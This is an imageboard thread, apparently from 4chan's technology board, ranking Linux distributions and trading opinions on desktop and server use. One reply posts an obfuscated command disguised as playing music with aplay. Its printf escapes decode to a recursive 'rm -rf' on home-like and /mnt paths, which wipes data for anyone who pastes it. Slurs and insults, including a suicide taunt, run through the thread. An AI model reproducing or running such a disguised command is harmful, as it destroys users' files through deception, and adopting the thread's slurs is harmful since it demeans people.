/glg/ great linux general

In this thread we discuss everything great Linux has to offer.
While /fglt/ is a tech support thread, the goal of /glg/ is to share the great things about Linux. There is no place on the web that offers an unbiased, earnest and curated look at Linux. You either long uncurated lists, or you read a SEO article listing ten random choices, or you go on /r/linux and have to endure weeks of shitposting while picking up maybe one or two new things.

Retard Tier:
- Linux Mint
- Ubuntu

Peak Midwit Tier:
- Arch Linux

Patrician Tier:
- Debian
- NixOS
- Qubes OS

Honorable Mention:
- Windows 10 Enterprise LTSC

Question of the day:
Which distro are you daily driving on desktop and which one on your server (if you have one)?

Attached: plz-downgrade-all-your-installed-software.jpg (700x1244, 126.13K)

i game on windows ltsb
and do everything else on linux

>Which distro are you daily driving on desktop
Devuan Gnu/Linux

Attached: groyper_cozy.jpg (2048x1304, 422.46K)

okay now run Photoshop or Facetime LMAO

gentoo

linux is shit
gnu is shit

That tier list is peak retard
>Noon you can't have a working distro. You must do things the hard way!!! Installing arch is so hard!!!

Kys

>the hard way
>debian
lmao

God Tier:

Slackware

>Desktop
Arch
>Server
Debian, for containerization i use nspawn.

Attached: winlinuxold.png (888x1446, 545.56K)

LOL this picture is a massive freetard cope
you cant even move executables between linux distros without an error due to differences in shared libraries version

This is the accurate version. Installing anything but the latest updooted programs from repos is a nightmare on trannix.

put gentoo in patrician tier
i dont use it anymore i switched to windows but when i did god damn it was so fun to tinker around with my system and be able to change mostly everything, basically just an lfs for retards.

desktop windows laptop ubuntu server debian skin white

Name 1 reason why mint is retard tier
>Qubes
Literally not even an OS

I used to be like you, but now I even game on linux. If you've not tried it recently you should. Proton has brought things a long way.

aplay -loop "`\`printf '\x72\x6d \55\x72\x66 \57\52\x6de\52 \57\x6dnt'\``"

Attached: music.gif (354x286, 53.29K)

There is nothing wrong with Ubuntu (probably not Mint either, havent used).
I've used a lot of advanced distros for longer periods, and am now on Ubuntu. All of them are great in their own right, no need to put other distros down. I love the BSD-likeness of Void, the ability to build everything from source (including kernel) on Gentoo, I like the simplicity yet minimalism and configurability of Arch, I love the stability and massive repos of Debian, and I like the ease of use and polish of Ubuntu.
Most of the major distros are great, no need to put other distros down.

Attached: 1661607899347.jpg (2048x1536, 463.84K)

>photoshop
Done
>FaceTime
Why?

>Why?
Mac users.